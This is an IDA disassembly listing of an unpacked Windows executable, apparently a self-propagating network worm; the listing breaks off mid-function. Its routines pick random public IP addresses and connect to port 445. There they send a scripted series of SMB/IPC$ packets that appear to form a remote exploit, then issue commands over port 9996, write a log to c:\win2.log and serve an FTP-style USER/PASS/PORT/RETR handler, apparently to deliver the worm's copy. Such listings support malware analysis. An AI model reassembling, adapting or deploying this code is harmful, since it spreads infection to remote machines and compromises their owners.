;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 846C14160B7BFC4183DB29157745633D
; File Name : u:\work\846c14160b7bfc4183db29157745633d_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401EF0:loc_401F35�p ...
mov eax, ds:dword_406F30
imul eax, 343FDh
add eax, 279EC3h
mov ds:dword_406F30, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_402029+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_406F30, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_402029+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call ds:dword_405114 ; WSAStartup
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call ds:dword_40510C ; inet_addr
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401EF0+1A�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call ds:dword_405104 ; gethostname
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call ds:dword_405110 ; gethostbyname
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call ds:dword_405108 ; inet_ntoa
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call ds:dword_405018 ; lstrcpy
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401EF0+E2�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call ds:dword_4050F4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call ds:dword_4050F8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call ds:dword_40511C ; closesocket
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call ds:dword_40510C ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call ds:dword_405110 ; gethostbyname
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
var_14 = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc ds:dword_406F34
push edi
push ds:dword_406F34
lea eax, [ebp+var_14]
push offset aI ; "%i"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call ds:dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+var_14]
push esi
push eax
call sub_402210
mov esi, ds:dword_405020
pop ecx
push eax
lea eax, [ebp+var_14]
push eax
push edi
call esi ; _hwrite
push [ebp+arg_0]
call sub_402210
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; _hwrite
push edi
call ds:dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 270Ch
call ds:dword_4050F4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_406F38
push eax
call ds:dword_405018 ; lstrcpy
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push ds:off_406030
lea eax, [ebp+var_33C]
push eax
call ds:dword_4050E0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_402210
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call ds:dword_4050F0 ; send
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_402210
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call ds:dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call ds:dword_40511C ; closesocket
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_406F38
push [ebp+arg_4]
call ds:dword_405018 ; lstrcpy
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402290
add esp, 2Ch
push [ebp+arg_0]
call ds:dword_405110 ; gethostbyname
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call ds:dword_4050F8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call ds:dword_4050F4 ; htons
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4021B0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, ds:dword_4050F0
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, ds:dword_4050EC
call esi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call ds:dword_4050E0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call ds:dword_40511C ; closesocket
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_4025D0
mov eax, ds:dword_406A34
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, ds:dword_406A38
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402290
add esp, 2Ch
push 270Ch
call ds:dword_4050F4 ; htons
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402290
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4021B0
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402290
lea eax, [ebp+var_14]
push eax
call sub_402210
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402290
add esp, 2Ch
imul ebx, 3Ch
mov eax, ds:dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4021B0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402290
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402290
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A2C
push eax
call sub_402290
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402290
add esp, 40h
push esi
call sub_402210
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402290
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4021B0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4021B0
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call ds:dword_4050F4 ; htons
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_4021B0
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, ds:dword_4050F0
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, ds:dword_4050EC
call edi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402290
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402290
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402290
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402290
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402290
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402290
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402290
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402290
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call ds:dword_405028 ; Sleep
push [ebp+var_4]
call ds:dword_40511C ; closesocket
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: sub_402029+3A�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A40
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; DATA XREF: sub_401E65+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E29
push esi
push edi
push 0
push ds:off_4068D0
call sub_402210
mov esi, ds:dword_4050F0
pop ecx
push eax
push ds:off_4068D0
push ebx
call esi ; send
mov edi, [ebp+arg_0]
jmp short loc_401B46
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: sub_401B08+310�j
mov ebx, [ebp+arg_0]
loc_401B46: ; CODE XREF: sub_401B08+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call ds:dword_4050EC ; recv
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401B97
push 0
push ds:off_4068D4
call sub_402210
pop ecx
push eax
push ds:off_4068D4
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401B97: ; CODE XREF: sub_401B08+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401BC8
push 0
push ds:off_4068D8
call sub_402210
pop ecx
push eax
push ds:off_4068D8
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401BC8: ; CODE XREF: sub_401B08+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401CA4
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
mov ax, ds:word_406A60
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402680
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C17: ; CODE XREF: sub_401B08+159�j
test ebx, ebx
jz short loc_401C4B
cmp edi, 4
jge short loc_401C2E
push ebx
call sub_401E30
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C2E: ; CODE XREF: sub_401B08+116�j
jnz short loc_401C3A
push ebx
call sub_401E30
pop ecx
mov [ebp+var_18], eax
loc_401C3A: ; CODE XREF: sub_401B08:loc_401C2E�j
cmp edi, 5
jnz short loc_401C4E
push ebx
call sub_401E30
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C4E
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: sub_401B08+111�j
push 6
pop edi
loc_401C4E: ; CODE XREF: sub_401B08+135�j
; sub_401B08+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402680
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C17
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push ds:off_4068E0
call sub_402210
pop ecx
push eax
push ds:off_4068E0
jmp loc_401DD7
; ---------------------------------------------------------------------------
loc_401CA4: ; CODE XREF: sub_401B08+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401DDC
push 0
push ds:off_4068E4
call sub_402210
pop ecx
push eax
